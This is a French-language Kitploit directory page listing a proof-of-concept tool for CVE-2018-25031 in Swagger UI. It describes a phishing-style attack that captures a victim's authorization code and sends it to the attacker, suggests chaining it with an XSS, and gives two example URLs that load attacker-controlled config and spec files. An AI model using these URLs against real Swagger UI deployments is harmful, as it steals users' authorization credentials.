Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
POC-CVE-2018-25031 — Un simple POC (CVE-2018-25031 | Kitploit
Outils/GitHubGitHub/geozin/poc-cve-2018-25031
Outils de PhishingAnalyse des VulnérabilitésExploitationExploitation d'Applications WebIngénierie Sociale
GitHubgeozin/poc-cve-2018-25031

POC-CVE-2018-25031

Un simple POC (CVE-2018-25031

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-25031 - Swagger UI avant la version 4.1.3

Un simple POC (CVE-2018-25031) qui amène la victime à saisir le code d'autorisation, lequel est ensuite envoyé à l'attaquant.
Vous pouvez l'utiliser avec la vulnérabilité XSS https://github.com/VictorNS69/swagger-ui-xss

Il est nécessaire de trouver le paramètre et d'assigner le bon fichier : pour configUrl, le fichier JSON, et pour url, le fichier YAML.

Exemple :

root@kitploit:~
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml

Capture d'écran :


Lorsque la victime tente d'utiliser l'API en saisissant le code d'autorisation et clique sur Execute, rien ne lui sera affiché. Cependant, une requête contenant le code d'autorisation sera envoyée à l'URL de l'attaquant.

Réf. :

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031

Télécharger l’outil